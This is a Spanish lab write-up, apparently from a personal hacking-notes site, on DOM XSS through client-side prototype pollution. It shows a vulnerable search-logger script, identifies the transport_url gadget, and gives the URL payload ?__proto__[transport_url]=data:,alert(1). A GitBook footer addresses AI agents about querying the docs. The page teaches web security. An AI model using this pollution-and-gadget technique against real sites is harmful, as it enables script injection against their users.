> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/web/prototype-pollution/dom-xss-via-client-side-prototype-pollution.md).

# XSS DOM a través de contaminación de prototipos del lado del cliente

#### XSS en el DOM mediante contaminación de prototipos del lado del cliente

#### Contexto del laboratorio

La aplicación es vulnerable a una **XSS en el DOM** activado por una **contaminación de prototipos** (del lado del cliente). / Propósito: **contaminar `Object.prototype`** con una propiedad útil, encontrar un **gadget** en el JS que lo gestiona, luego ejecutar `alert()`.

### 1) Observación de la contaminación del prototipo

#### Fuente de contaminación (en la URL)

Las propiedades pueden inyectarse en `__proto__` a través de los parámetros:

<pre class="language-javascript"><code class="lang-javascript"><strong>/?__proto__[foo]=bar
</strong></code></pre>

#### Comprobación en la consola

Después de navegar, se comprueba que la propiedad "fail" está en todos los objetos:

```javascript
console.log({}.foo)
```

<figure><img src="/files/bfe7e64a89e1de355d36dff5d5a85ed428a4873f" alt="" width="563"><figcaption></figcaption></figure>

### 2) Código vulnerable del cliente

El sitio contiene una lógica de

```javascript
async function logQuery(url, params) {
    try {
        await fetch(url, {method: "post", keepalive: true, body: JSON.stringify(params)});
    } catch(e) {
        console.error("Failed storing query");
    }
}

async function searchLogger() {
    let config = {params: deparam(new URL(location).searchParams.toString())};

    if(config.transport_url) {
        let script = document.createElement('script');
        script.src = config.transport_url;
        document.body.appendChild(script);
    }

    if(config.params && config.params.search) {
        await logQuery('/logger', config.params);
    }
}

window.addEventListener("load", searchLogger);
```

Punto clave: el código lee **`config.transport_url`** y lo usa como **fuente de un `<script>`**.

### 3) Gadget explotable identificado

#### Gadget

* `config.transport_url`

#### Por qué esto es peligroso

Si `transport_url` existe (incluso a través del prototipo), el script hace:

* crear un `<script>`
* `script.src = config.transport_url`
* integración en el DOM

Así podemos forzar al navegador a cargar un script desde una URL controlada.

### 4) Operación: activar el XSS

#### Payload (contaminación + ejecución)

`Object.prototype.transport_url` está contaminado con una `data:` URL que ejecuta `alert(1)`:

```javascript
?__proto__[transport_url]=data:,alert(1)
```

<figure><img src="/files/6f9b587d76a5d797351aa8818bc23ce6c781dea7" alt=""><figcaption></figcaption></figure>

#### Efecto secundario en el DOM

El código termina generando algo equivalente a:

```javascript
<script src="data:,alert(1)"></script>
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/web/prototype-pollution/dom-xss-via-client-side-prototype-pollution.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
